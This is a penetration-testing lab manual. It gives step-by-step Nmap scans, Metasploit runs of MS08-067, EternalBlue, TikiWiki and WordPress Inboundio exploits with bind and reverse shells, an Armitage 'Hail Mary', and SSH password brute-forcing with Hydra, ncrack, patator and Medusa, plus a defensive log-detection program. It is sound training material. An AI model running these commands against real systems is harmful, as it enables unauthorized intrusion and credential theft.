Penetration Testing Steps
Module 01: Penetration Testing Steps
Scenario
In this lab you will
- Review the process of professional security testing
- Perform validation of vulnerabilities
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Once you have logged in, open a terminal window, type nmap -sP 192.168.177.0/24 and press Enter. (-sP is the older name for -sn, a ping sweep with no port scan; current Nmap accepts both.)
This is the first step of our scanning methodology: the discovery of live systems.
- Next we scan the discovered machines for open ports, the second step of the scanning methodology. In the terminal window type nmap -sS 192.168.177.100,252 and press Enter. (Nmap's comma syntax in the last octet scans .100 and .252 only.)
- Once that scan completes, perform the third step of the scanning methodology, service version detection: in the terminal window type nmap -sV 192.168.177.100,252 and press Enter.
While you wait for the scan to complete, start identifying interesting information about the discovered targets. In this case both boxes are Windows; the next thing to look at is the potential attack surface of each target, so we can decide what to attack first.
From the results we can see an old version of Internet Explorer as well as Microsoft SQL Server 2000. Both indicate significant risk to the client's network from this machine; treat the network as being at critical risk.
Scroll down to view the Microsoft SQL Server 2000 version string.
- The next scan is the Nmap "everything" scan, the -A option, which combines OS detection, version detection, the default NSE scripts and traceroute. In the terminal window type nmap -A 192.168.177.100,252 and press Enter.
This scan takes some time to complete, but it gives the most accurate assessment of the operating system, along with whatever the default scripts enumerate from SMB and the other "friendly" protocols.
The results show we have two operating systems:
- Windows 7 Service Pack One
- Windows Server 2003 Service Pack Two
- The next step in our methodology is to identify vulnerabilities. We could run a scanner like Nessus, which you have probably done, or, since we have a Windows Server 2003 machine and a Windows 7 machine, use Metasploit and try two of the most famous vulnerabilities for those platforms. We could also check for the vulnerabilities with Nmap Scripting Engine scripts (smb-vuln-ms08-067 and smb-vuln-ms17-010), which we cover in more detail later.
- In the terminal window, type msfconsole and press Enter to start up the Metasploit tool.
- Once the tool loads, type search ms08-067 and press Enter. This searches for the exploit for the famous Microsoft Server service vulnerability. You will get a message about using slow search because no database is connected; that is fine for now, we will take care of it later when we work with the database inside Metasploit.
Once the search returns, look at the information, particularly the rank: it is ranked great, and we like to see that as often as possible, otherwise we cannot be confident the exploit will work.
- In msfconsole type use exploit/windows/smb/ms08_067_netapi and press Enter. This places you in the exploit module; once there, type info and press Enter to read about it. It is always a good idea to read about an exploit, and to test it in a lab, before ever running it on a client engagement.
As the information shows, the bug being exploited is in the path canonicalization code of the Server service (NetAPI32.dll). The module can also bypass NX (Data Execution Prevention), the protection that marks the stack and other data pages non-executable, on some OS and service pack combinations.
- Once you have reviewed the details, type show options and press Enter. Review the available options; in this case only one required item is missing, the target address. Type set RHOST 192.168.177.252 and press Enter.
- Type show payloads and press Enter to list the payloads compatible with this exploit. Type set payload windows/meterpreter/bind_tcp and press Enter. A bind payload listens on the target and we connect to it, so the target must be directly reachable from Kali; that is the case here, while a reverse payload is the usual choice when a firewall sits in between.
- Before attempting the exploit, type show targets and press Enter. There are many targets for this exploit because the stack layout differs across OS versions, service packs and languages; the default target, Automatic Targeting, fingerprints the host for you. Once you are ready, type exploit and press Enter.
- If all goes well you will see a Meterpreter session open and the exploit succeed. We always say exploitation is not 100%, but ms08-067 gets close.
You now have the powerful Meterpreter shell on the machine, and from here it is a matter of what you want to do; for this first lab we only wanted to review the process to refresh your memory. The process is the key: it does not change, only the tools and the targets change.
The key here is to record the information about the target, and above all to take screenshots of the successful exploit for the report.
Close the terminal window.
- We have another box, the Windows 7 machine. There was a famous attack against Windows that resulted in many malware infections, and that is what we will look for now. We will cover this several times in great detail as the course progresses, but for now we want to practice the process so we can move on to more topics.
The vulnerability we are looking for is EternalBlue, the SMBv1 flaw used by the WannaCry worm; it is Microsoft bulletin MS17-010, so that is what we search for in Metasploit. Launch a new terminal window, type msfconsole and press Enter to launch the framework. In msfconsole type search ms17-010 and press Enter.
- Of the results that come back we want the exploit module, so concentrate on that one. As you can see its rank is average, which can be a concern. Type use exploit/windows/smb/ms17_010_eternalblue and press Enter.
- This places you in the exploit module. Type info and press Enter to read about it; as the description says, the exploit does not always work.
- Type show targets and press Enter. Within this version of Metasploit there are only two targets, Windows 7 and Windows Server 2008 R2 (x64); if your machine were anything else, you could not use this exploit module.
- After you have reviewed the information, it is time to set the target and try our luck, type set RHOST 192.168.177.100 and press Enter.
- Once the target is set, you can look at the options by typing show options and press Enter.
- When you are ready, type exploit and press Enter.
- Once the exploit starts, read the output of what it is doing. You are looking for WIN; if it prints FAIL, keep waiting, because the module retries. After some time it will either give up or report WIN.
Once you have the shell, it is the same process as before, and what you do next again depends on the scope of work and rules of engagement negotiated with the client.
- Type netstat -an and press Enter; you should see the connection to the exploited machine.
- We have accomplished what we want to in this lab, so we can close out from the lab and complete the exercise.
The one thing to remember is that both of these vulnerabilities are in SMB and need port 445 to be open as the attack vector (ms08_067_netapi can also be delivered over 139/tcp, the NetBIOS session port). Discovering that attack surface is the first thing we must do in our testing, and it is part of professional penetration testing: showing the client their attack surface and, more importantly, their risk.
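Both Windows labs start from the same fact: the host must expose SMB before either module is worth trying. The script below is an added example, not part of the original lab material, that turns the grepable output of the version scan (nmap -sV -oG) into the target database the later exercises ask you to keep, lists the hosts with 445/tcp open, and prints the NSE check to run against them before reaching for Metasploit. The scan output it parses is constructed for the example: the two Windows addresses are the lab's, the third host (192.168.177.10) and all version strings are invented.

```shell
#!/bin/sh
# Added example, not part of the original lab: parse "nmap -sV -oG" (grepable)
# output into a target database and pick out the hosts that expose 445/tcp,
# the precondition for both MS08-067 and MS17-010. Needs only awk, sed and tr.

# Constructed grepable output for the two lab targets plus one invented Linux
# host. Fields on a "Host:" line are tab-separated; each "Ports:" entry has the
# form port/state/proto/owner/service/rpc_info/version/ (nmap writes "|" in
# place of "/" inside the version text, so splitting on "/" is safe).
sample_gnmap() {
  printf '%s\n' '# Nmap 7.70 scan initiated as: nmap -sV -oG - 192.168.177.100,252 (constructed)'
  printf '%s\t%s\n' 'Host: 192.168.177.100 ()' 'Status: Up'
  printf '%s\t%s\t%s\n' 'Host: 192.168.177.100 ()' \
    'Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Windows 7 Professional 7601 Service Pack 1 microsoft-ds/, 3389/filtered/tcp//ms-wbt-server///' \
    'Ignored State: closed (996)'
  printf '%s\t%s\n' 'Host: 192.168.177.252 ()' 'Status: Up'
  printf '%s\t%s\t%s\n' 'Host: 192.168.177.252 ()' \
    'Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Microsoft Windows 2003 microsoft-ds/, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2000 8.00.194/' \
    'Ignored State: closed (995)'
  printf '%s\t%s\t%s\n' 'Host: 192.168.177.10 ()' \
    'Ports: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4/' 'Ignored State: closed (999)'
  printf '%s\n' '# Nmap done -- 3 IP addresses (3 hosts up) scanned'
}

# stdin: grepable nmap output -> stdout: one "host,port,proto,service,version"
# line per OPEN port. Filtered/closed ports and "Status:" lines are dropped.
parse_gnmap() {
  awk -F'\t' '
    /^Host:/ {
      host = $1
      sub(/^Host: /, "", host); sub(/ .*/, "", host)
      for (i = 2; i <= NF; i++) {
        if ($i !~ /^Ports: /) continue
        n = split(substr($i, 8), entry, /, /)
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")
          if (f[2] == "open")
            printf "%s,%s,%s,%s,%s\n", host, f[1], f[3], f[5], f[7]
        }
      }
    }'
}

# stdin: target database -> stdout: unique hosts with 445/tcp open.
smb_candidates() {
  awk -F',' '$2 == 445 && $3 == "tcp" && !seen[$1]++ { print $1 }'
}

# stdin: candidate hosts -> stdout: the NSE check to run next. Prints nothing
# and returns 1 when there are no candidates. Both scripts ship with Nmap.
smb_check_cmd() {
  hosts=$(tr '\n' ' ' | sed 's/ *$//')
  [ -n "$hosts" ] || return 1
  printf 'nmap -n -Pn -p 445 --script smb-vuln-ms08-067,smb-vuln-ms17-010 %s\n' "$hosts"
}

# Worked run on the constructed scan: build the database, then print it and
# the follow-up validation command.
db=$(sample_gnmap | parse_gnmap)
printf 'target database (host,port,proto,service,version):\n%s\n' "$db"
check=$(printf '%s\n' "$db" | smb_candidates | smb_check_cmd) \
  && printf 'next step: %s\n' "$check"
```

For the real lab, run nmap -sV -oG targets.gnmap 192.168.177.100,252 and replace sample_gnmap with cat targets.gnmap. The printed --script line is the validation step: smb-vuln-ms17-010 is in the safe category and reports VULNERABLE without exploiting anything, while smb-vuln-ms08-067 is intrusive and its own documentation warns it can crash the Server service, so run it only when the rules of engagement allow an outage.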
In this lab, the following activities were learned:
- Review the process of professional security testing
- Perform validation of vulnerabilities
Exploitation
Exercise 1: Search for Exploits using Searchsploit Tool
Scenario
The objective of this lab is to get the students to use the searchsploit tool for searching exploits in Kali Linux. The following activities will be performed:
- Start the searchsploit tool
- Search for exploits
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open the terminal window, type searchsploit and press Enter.
This prints the usage and options of the command, as shown in the screenshot.
- As you can see, we can combine up to three terms in a search, so we will try that now.
In a terminal window, type searchsploit wu-ftp remote and press Enter.
This searches for remote exploits against the Washington University FTP daemon (wu-ftpd). It is rare to run into this FTP server today, but it is possible, and the important thing is the process, which does not change for any other search.
The output of this command is shown in the screenshot.
- The next step in the process is to look at the source code, then build the code and see whether we can exploit the vulnerability we discovered. Remember that exploitation is not 100%, so there are no guarantees.
We can also search from within the Metasploit framework, but we will do that in a later exercise.
- Close the terminal window.
In this lab, the following activities were learned:
- Start the searchsploit tool
- Search for exploits
As a proficient tester, we need to use a variety of tools to provide the data we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. With respect to exploitation there are a number of automated tools and toolkits to choose from. It is imperative that you work with a variety of targets and practice frequently, progressing through the skills by making the targets progressively harder: start with easy targets and work your way up.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit to a vulnerability, review the exploit code, and then attempt to exploit a target. The following activities will be performed:
- Conduct the scanning methodology against the machine
- Identify vulnerabilities
- Search for an exploit for the vulnerability
- Prepare the exploit
- Compile the exploit
- Attempt to exploit the machine
- Add information to the target database
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- The first thing we want to do is to scan the target with Nmap and see what we can find.
Open a terminal window, type nmap -f -n -Pn -v -p- -T4 192.168.100.231 and press Enter.
- We use a fragmented scan (-f) to make the scan harder for a signature-based IDS to detect; note that a full-port scan at -T4 is still noisy in terms of packet volume.
- In the advanced section, we will cover evasion in more detail.
This scan will take a while to complete as it scans all 65535 ports, which is what the -p- option requests.
- While it runs, you should be filling in your target database.
- Do you notice anything of interest on this target? To look deeper at a machine we use enumeration. There are a number of ways to do this, and several have been covered in previous exercises, so we will use another method that has not been covered: the very fast scanner unicornscan. This is another tool we can use for validation.
In a terminal window, type unicornscan -i eth1 -mT -r 500 -I 192.168.100.231 and press Enter.
- The -r option is the rate, in this example 500 packets per second; -mT selects TCP SYN mode and -I reports results immediately.
- To look at the UDP ports, type unicornscan -mU -r 500 -I 192.168.100.231 in the terminal window and press Enter.
- We now have additional information, so we can make a more directed scan with our favorite tool Nmap.
In a terminal window, type nmap -n -sTUV -pT:22,80,111,139,143,445,1024,U:111,137 192.168.100.231 and press Enter.
We are telling Nmap to scan only the ports we specify and return version information for them. A sample of the output from this scan is shown in the screenshot.
- We can use the power of Nmap and its scripting engine to enumerate further information from the target.
In a terminal window, type nmap -sC 192.168.100.231 and press Enter.
A sample of this command's output is shown in the screenshot.
- We have an interesting port on the machine, and this port initially causes Nmap to misidentify the OS, so we will take a closer look at it now. Since it is an SMB service, we use our SMB tools.
In a terminal window, type smbclient -L 192.168.100.231 -N and press Enter.
A sample of the output is shown in the screenshot.
- We now have the version of Samba the machine is running, and we know there have been vulnerabilities in Samba in the past, so we turn our focus to this version. Remember, the target is the specific version or revision of the software.
- Earlier we covered a number of ways to search for vulnerabilities and exploits. We will not repeat that process here; you can use any of the techniques shown thus far, but we will use the searchsploit tool.
In a terminal window, type searchsploit samba and press Enter.
A sample of the output of this command is shown in the screenshot.
- We have a number of Samba vulnerabilities with exploits. Now, the challenge is which one do we use?
We have to select one that applies to our version of the software, and then look for those that provide a privileged level of access. This largely comes down to trial and error: try, and if it does not work, try harder.
Welcome to the world of a professional security tester.
- We will save you some time: we have discovered Samba 3.4.7, and most of these exploits will fail when you try them against it. There is a chance one might work, but nothing is guaranteed; the most important thing is the process.
- Since this is a deliberately vulnerable machine, there are many vulnerabilities we can exploit. Open the Firefox browser and enter http://192.168.100.231/tikiwiki.
An example of this is shown in the screenshot. The thing to note here is the version of TikiWiki installed.
- Now we want to search for a vulnerability and see if we can find an exploit to leverage it.
In a terminal window, type searchsploit tikiwiki and press Enter.
An example of the search is shown in the screenshot.
- From here, the process is to find an exploit whose version matches ours, and then either run it with the interpreter for Perl, Python, etc., or compile the code. In this case, you are welcome to experiment, or use a little help, as we will show in the next two labs.
- Close all the windows.
In this lab, the following activities were learned:
- Conduct the scanning methodology against the machine
- Identify vulnerabilities
- Search for an exploit for the vulnerability
- Prepare the exploit
- Compile the exploit
- Attempt to exploit the machine
- Add information to the target database
As a proficient tester, we need to use a variety of tools to provide the data we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. With respect to exploitation, there are a number of automated tools and toolkits to choose from; the most popular is Metasploit, which we review in this exercise.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the search feature within Metasploit. Next, we will attempt to exploit the finding.
The following activities will be performed:
- Scan the target
- Identify the vulnerabilities
- Find the exploit for the vulnerability
- Prepare the exploit
- Exploit the machine
- Add information to the target database
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Metasploit uses PostgreSQL as its database so it needs to be launched first.
Open a terminal window, type service postgresql start and press Enter.
You can verify that PostgreSQL is running by checking the output of ss -ant and making sure that port 5432 is listening.
- With PostgreSQL up and running, we next need to create and initialize the msf database.
In a terminal window, type msfdb init and press Enter.
- Now that the PostgreSQL service is running and the database is initialized, we need to launch msfconsole.
In a terminal window, type msfconsole and press Enter.
After a few moments you should see the banner and a screen similar to the one shown in the screenshot.
As you can see, in this instance the tool has 1519 exploits in it.
- A powerful feature of the tool is that we can perform other steps of our methodology from within it, not just exploitation. We will now run an Nmap scan from within the tool. Enter the following command:
db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.100.231
A sample of the output of this command is shown in the screenshot.
Note: That is the letter "O" (OS detection) and not a zero in the command.
- We will now look at the target database capability of Metasploit. In the terminal window with the Metasploit prompt, type hosts and press Enter. The output of this command is shown in the screenshot.
- The power of the database is that we can review our targets without leaving the framework; for example, enter services -p 22.
This returns all hosts with a service recorded on port 22 (ssh). A sample of this is shown in the screenshot.
- There are many features within Metasploit, and it is highly recommended that you work with the tool and practice with it often. We have looked at features enough; let us see if we can exploit.
- We know from the previous exercise, there is a vulnerability in the TikiWiki service that is running on our target machine. We can search for exploits in Metasploit using the search feature, enter search tikiwiki.
- As you can see by looking at the output as shown in the screenshot, there are a number of exploits for the TikiWiki application.
The main column for us here is the rank. We want to select high ranking exploits, so we have a better chance of success.
- We could research which ones work, but for the time being we will try one that should.
Here we will use the exploit/unix/webapp/tikiwiki_graph_formula_exec exploit.
In the terminal window with the Metasploit prompt, type use exploit/unix/webapp/tikiwiki_graph_formula_exec and press Enter.
- To obtain the information needed for an exploit we use the info command; enter info. The output of this command is shown in the screenshot.
- We now need to set the options. To get a list of them, enter show options.
- With this exploit we do not have many options to set. RHOST is the target, and this exploit has only one target; some exploits have an extensive target list. Enter set RHOST 192.168.100.231.
- The next thing we need to do is choose the payload, so enter show payloads.
We will use what is called a reverse shell, which simply means the target connects back to us. Enter set payload generic/shell_reverse_tcp. Once the payload is set, we have to look at our options again.
- Enter show options.
We will set the following options:
- set LHOST 192.168.100.203
- set LPORT 666
- Once we have entered the options, you can check them by entering show options again.
You should see output similar to that shown in the screenshot.
- We are now ready to attempt the exploit. It is always recommended that you capture the traffic used, so you can analyze it and better understand how the exploit works. Start a capture in Wireshark.
In another terminal window, enter wireshark and start a capture on the eth1 interface.
- In your Metasploit terminal window, enter exploit.
- If all goes well you will see a command session start: we have used Metasploit and obtained a shell. A sample of the output is shown in the screenshot.
- We set the port to 666, but it can be any port we want. Just remember that an administrator might know Metasploit's default listener port (4444) and block it; at least if they have been to CAST 614 they will.
You will also notice the exploit opens many shells; just background the session with Ctrl+Z and then enter y.
- Enter sessions -l to list the sessions, and then sessions -i # where # is the number of the session to interact with. Type the ls command to see the directory listing.
The output of the ls command is shown in the screenshot.
- As with all exploits, we should be looking at this in Wireshark.
In the Wireshark window:
- Select a packet going from the source (192.168.100.203) to the target (192.168.100.231)
- Right-click and select Follow | TCP Stream
- The next thing to look at in Wireshark is the reverse shell connection. An example of this with the shell command is shown in the screenshot.
Note: To find the packets of the reverse shell connection, pick some words from the output of the ls command (refer to Step 24) and search for them in Wireshark using the search filter.
- Close all the windows.
In this lab, the following activities were learned:
- Scan the target
- Identify the vulnerabilities
- Find the exploit for the vulnerability
- Prepare the exploit
- Exploit the machine
- Add information to the target database
As a proficient tester, we need to use a variety of tools to provide the data we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. We also have an open source tool that provides the capability to manage engagements and is a front-end for the Metasploit framework: Armitage.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the Armitage front-end to Metasploit, then attempt to exploit the finding.
The following activities will be performed:
- Scan from within Armitage
- Manage targets in Armitage
- Exploit targets with Armitage
- Add information to the target database
- Click Kali 2018.2. Drag the lock screen upward with the mouse.
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, type /etc/init.d/postgresql start and press Enter to start the PostgreSQL service.
- To start the Armitage application, navigate to Applications | 08 - Exploitation Tools | armitage.
- This will result in the tool starting and the window being displayed that is shown in the screenshot.
Accept the default settings and click Connect.
In the next window, click Yes.
- This starts a connection process that should eventually succeed; in some instances you have to try several times to get it to work.
- The first thing we want to do is to make sure we have our targets. If you did not see the target, then click on the Hosts menu. Here, you can manually add hosts, import hosts, perform Nmap scan, etc.
Click on Nmap Scan | Intense Scan from the Hosts menu and in the pop-up window enter the IP block of our targets, 192.168.100.100,231. The scan will take a minimum of 10 minutes to complete. We have other targets, but we concentrate on these two for this exercise.
Note: Here we are using the Windows 2003 Server (192.168.100.100) and OWASP (192.168.100.231) machines as targets.
- Now we have our targets listed, as shown in the screenshot.
Note: If for some reason your hosts are not showing (this does happen sometimes in Armitage), you can add them manually with Hosts | Add Hosts from the Hosts menu.
- Next we want to find the vulnerabilities, and Armitage makes this very simple. Click on Attacks | Find Attacks.
- In the window that opens, next click on OK once the attacks are discovered as indicated in the screenshot.
- There are many features within the Armitage tool, and it is highly recommended that you work with the tool and practice with it often. We have looked at features enough, let us see if we can exploit with the tool.
By selecting each target we could run one attack at a time, or we can run all attacks against all hosts, so we will try that first.
Click on Attacks | Hail Mary. In the window that opens, click Yes and just wait.
- The tool runs through all of the possible attacks, and if one is successful it indicates this with a set of lightning bolts on the host icon, as shown in the screenshot.
As indicated in the screenshot, there are a number of exploits found for the targets.
Note: We do not always have success with the Hail Mary, so if it fails, run it again.
- In the Hail Mary tab, scroll to the bottom. You will see the Active sessions section with information about the successful exploits; you can see one of our machines is vulnerable to the tikiwiki exploit.
- If the Hail Mary fails, we go back and do our exploitation the way we always do, by researching it.
We know the TikiWiki exploit works on the one machine, so right-click the Linux (OWASP) machine and select Attack | webapp | tikiwiki_graph_formula_exec. There are many webapp findings, so it takes a while to locate it.
- This brings up the window shown in the screenshot, allowing us to set the Metasploit options. Check Use a reverse connection and click Launch.
- We have mentioned before that exploitation is not 100%, but if it all goes well and this is a good exploit day you should see something similar to the screen shown in the screenshot.
- Now that we have an exploited box, if you right-click on it you will see there are a number of options that are available to us, so it would be a good idea to explore and practice with this tool as it is an excellent tool for our toolbox.
The attached screenshot shows some of the options available once we have exploited a machine.
- Right-click on the Linux (OWASP) machine and select Shell 2 | Interact. This opens a shell as shown in the screenshot.
- Type ls in the shell and press Enter to list the files and directories on the target machine.
You should see output similar to that shown in the screenshot.
- Sometimes the box will not fall over, and no matter what you try it just does not fall; this is why exploitation is not 100%. In most professional security testing you will not need the box to fall over: your job is to draft a report of the findings, not to exploit every target.
- Close all the windows.
In this lab, the following activities were learned:
- Scan from within Armitage
- Manage targets in Armitage
- Exploit targets with Armitage
- Add information to the target database
In this lab you will
- Use the searchsploit tool to research exploits
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, type man searchsploit and press Enter. Exit the man page by pressing q.
- After you have exited, type searchsploit -h and press Enter. This shows the usage of the tool.
- Type searchsploit samba and press Enter. This searches for all of the Samba exploits, and as you can see there are many of them, so let us reduce our search and make it more granular: type searchsploit samba remote and press Enter.
As the terms imply, this search only shows Samba exploits that are remotely accessible, which reduces the returned results significantly.
As you look through the list you can see a variety of exploits, written in a variety of scripting languages as well as in C.
- The challenge here is finding which one works for your attack. Next, type searchsploit smb remote and press Enter. This is similar to the samba search, but as you can see it returns fewer results than the samba search did, and we can use this to make our search more effective.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
In this lab, the following activities were learned:
- Use the searchsploit tool to research exploits
In this lab you will
- Use a variety of tools to conduct a remote password attack
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, and type cd /usr/share/wordlists and press Enter.
- One of the tools we like to use for this is Hydra; type man hydra and press Enter. As the man page says, Hydra is a powerful tool that supports numerous protocols. Take a few minutes and look over the details in the man page.
Exit the man page by pressing q.
- Next, type hydra -l kevin -P lpt.txt 192.168.177.250 ssh and press Enter. We have customized the dictionary file so the lab does not take as long as a brute force using one of the other dictionaries could.
Thus you have gained the password of the target machine using Hydra.
192.168.177.250 is the IP address of the Ubuntu 64-bit machine.
- We are now ready to run patator; type man patator and press Enter. Read about the tool: it is a multi-purpose brute-forcer, and we want to run it, so take a few minutes to review the man page and see the different modules that are available.
Exit the man page by pressing q.
- In a terminal window type patator ssh_login host=192.168.177.250 user=kevin password=FILE0 0=lpt.txt and press Enter. As it runs you will see it work through the list; look for the SSH banner, and then you will see the password that was used.
- The next tool we will look at is the tool ncrack, as before, type man ncrack and press Enter. Take a few moments and review the man page so you are familiar with the tool, once you are done reading the man page, exit the man page by pressing q.
- Type ncrack -v --user kevin -P lpt.txt ssh://192.168.177.250 and press Enter. This will run the tool; wait for the results. After a few moments you should see the results displayed showing that the tool discovered the password, and it is kevinpw.
Once you have the password, press Ctrl+C to stop the attack.
- The next tool we want to look at is Medusa. Type man medusa and press Enter; when the man page opens, take a few minutes to review the information about the tool. Once you have finished reading the information, exit the man page by pressing q.
- We are now ready to run the tool. Type medusa -h 192.168.177.250 -u kevin -P lpt.txt -M ssh and press Enter. Once the scan runs, after a few moments you should see the password is discovered.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
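All four tools above leave the same footprint on the target: a burst of failed SSH logins from one source address in the Ubuntu machine's auth.log. The C program below is added here as an illustration and is not part of the lab; it shows the minimal detection a defender would run over that log, tallying sshd "Failed password" and "Accepted password" lines per source address and raising an alert for a source that crosses a failure threshold, with a success that follows the burst treated as the most serious case. The log lines are constructed for the example in OpenSSH's standard message format; the addresses, the threshold and the function names are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 32
#define THRESHOLD   5      /* failures from one source before alerting (assumed) */

struct source_stats {
    char ip[46];           /* large enough for an IPv6 text address */
    int  failures;
    int  successes;
};

/* Constructed auth.log excerpt, not real log data: six bad guesses and
 * then a success from one source, one innocent typo from another. */
const char *const sample_lines[] = {
    "Mar  1 10:00:01 ubuntu sshd[1201]: Failed password for kevin from 192.168.177.100 port 40001 ssh2",
    "Mar  1 10:00:01 ubuntu sshd[1203]: Failed password for kevin from 192.168.177.100 port 40002 ssh2",
    "Mar  1 10:00:02 ubuntu sshd[1205]: Failed password for kevin from 192.168.177.100 port 40003 ssh2",
    "Mar  1 10:00:02 ubuntu sshd[1207]: Failed password for invalid user admin from 192.168.177.100 port 40004 ssh2",
    "Mar  1 10:00:03 ubuntu sshd[1209]: Failed password for kevin from 192.168.177.100 port 40005 ssh2",
    "Mar  1 10:00:03 ubuntu sshd[1211]: Failed password for kevin from 192.168.177.100 port 40006 ssh2",
    "Mar  1 10:00:04 ubuntu sshd[1213]: Accepted password for kevin from 192.168.177.100 port 40007 ssh2",
    "Mar  1 10:05:17 ubuntu sshd[1300]: Failed password for kevin from 192.168.177.50 port 51022 ssh2",
    "Mar  1 10:05:20 ubuntu sshd[1300]: Accepted password for kevin from 192.168.177.50 port 51022 ssh2",
};
const int sample_count = (int)(sizeof sample_lines / sizeof sample_lines[0]);

/* Classify one sshd line and copy its source address into ip.
 * Returns 1 for a failed login, 2 for an accepted login, 0 for anything else. */
static int classify(const char *line, char *ip, size_t iplen)
{
    int kind = 0;
    const char *p = strstr(line, "Failed password for ");
    if (p != NULL)
        kind = 1;
    else if ((p = strstr(line, "Accepted password for ")) != NULL)
        kind = 2;
    if (kind == 0)
        return 0;
    p = strstr(p, " from ");
    if (p == NULL)
        return 0;
    p += 6;                                 /* skip " from " */
    size_t i = 0;
    while (p[i] != '\0' && p[i] != ' ' && i + 1 < iplen) {
        ip[i] = p[i];
        i++;
    }
    ip[i] = '\0';
    return kind;
}

/* Aggregate per source address; returns the number of distinct sources seen. */
int tally(const char *const *lines, int nlines, struct source_stats *stats, int maxstats)
{
    int n = 0;
    for (int l = 0; l < nlines; l++) {
        char ip[46];
        int kind = classify(lines[l], ip, sizeof ip);
        if (kind == 0)
            continue;
        int s = 0;
        while (s < n && strcmp(stats[s].ip, ip) != 0)
            s++;
        if (s == n) {                       /* first time we see this source */
            if (n == maxstats)
                continue;
            strcpy(stats[n].ip, ip);        /* classify() bounded it to fit */
            stats[n].failures = 0;
            stats[n].successes = 0;
            n++;
        }
        if (kind == 1)
            stats[s].failures++;
        else
            stats[s].successes++;
    }
    return n;
}

/* 0: nothing to report; 1: failure burst; 2: failure burst followed by a login. */
int verdict(const struct source_stats *s)
{
    if (s->failures < THRESHOLD)
        return 0;
    return s->successes > 0 ? 2 : 1;
}

int main(void)
{
    static const char *const label[] = { "ok", "ALERT: password guessing", "ALERT: guessing followed by login" };
    struct source_stats stats[MAX_SOURCES];
    int n = tally(sample_lines, sample_count, stats, MAX_SOURCES);
    for (int i = 0; i < n; i++)
        printf("%-16s failures=%d successes=%d  %s\n", stats[i].ip,
               stats[i].failures, stats[i].successes, label[verdict(&stats[i])]);
    return 0;
}
```

The threshold is deliberately low for a sample this small; on a real host you would tune it per time window and feed the same counters from a log shipper rather than a static array, but the classification and the "success after a burst" rule are what a rule in any SIEM for this activity boils down to.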
- Use a variety of tools to conduct a remote password attack.
Exercise 7: Inboundio Exploit
Scenario
In this lab you will
- Use the process and methodology you have used in the course to discover a weakness in WordPress and then attempt to exploit the discovered weakness
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window and type whatweb http://192.168.177.245:81/wordpress and press Enter.
We are going to use the whatweb tool to assess the web server and applications that are running on the machine. This should return a great deal of information about the server and the applications that are on the machine.
Take a few minutes and review the information that has been returned, and you will notice that we have a version of WordPress on the machine, and since WordPress has been known for many vulnerabilities we know this might provide us a method of attack.
As you review the information you will also discover that this machine is running version 4.9.4 of WordPress, so we can use that as a reference point when looking for vulnerabilities.
- Now that we have some data, let's look at another tool. Type wpscan --url http://192.168.177.245:81/wordpress --enumerate u and press Enter.
At the prompt accept the default of N because we do not have an Internet connection here. We do not see a lot here with respect to the users, but we do see an interesting plugin that is vulnerable.
- So let's go ahead and scan for installed plugins. Type wpscan --url http://192.168.177.245:81/wordpress --enumerate p and press Enter.
From the results of the scan we have some other findings, but we want the ones in red, and the Inboundio marketing plugin is a good target vector to start with.
We could use searchsploit and look for an exploit for this, and you are welcome to do so, or we could do it the old-fashioned way of using Metasploit to do our heavy lifting, and this is the approach we will take here.
- Start the database services by typing service postgresql start and pressing Enter.
- To launch msfconsole, type msfconsole and press Enter.
- When Metasploit launches, type search inboundio and press Enter to search for an exploit for our finding. This will return an exploit with a rating of excellent, which is what we like.
- In the msfconsole type use exploit/unix/webapp/wp_inboundio_marketing_file_upload and press Enter. This should enter you into the exploit; as always, type info and press Enter to read about the exploit.
As you see from the description, it does not fit our findings exactly, but it is sufficient enough of a match. As a reminder, even if the exploit is a perfect match, it does not mean success.
- Type the following commands in the msfconsole:
Type set RHOST 192.168.177.245 and press Enter.
Type set RPORT 81 and press Enter.
Type set TARGETURI /wordpress and press Enter.
- Once you have entered the target details, you are ready to attempt the exploitation. Type exploit and press Enter. Wait for a shell; if it is a good exploit day you should have one.
- In the meterpreter shell type getuid and press Enter.
- This will show that you are user www-data, so that means we have to escalate privileges from here, and that will be covered later.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Use the process and methodology you have used in the course to discover a weakness in WordPress and then attempt to exploit the discovered weakness
Exercise 8: Metasploit Module Architecture
Scenario
In this lab you will
- Take an exploit from the Metasploit and review it
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- The module we will investigate is the one used to detect the version of an HTTP server. The first thing we want to do is take a look at the Metasploit core code. In the terminal window type cd /usr/share/metasploit-framework/lib/rex/proto/http and press Enter.
- To view the contents type ls -X and press Enter. These files contain a variety of HTTP methods, including functions to set up a connection, send GET and POST requests, and handle responses.
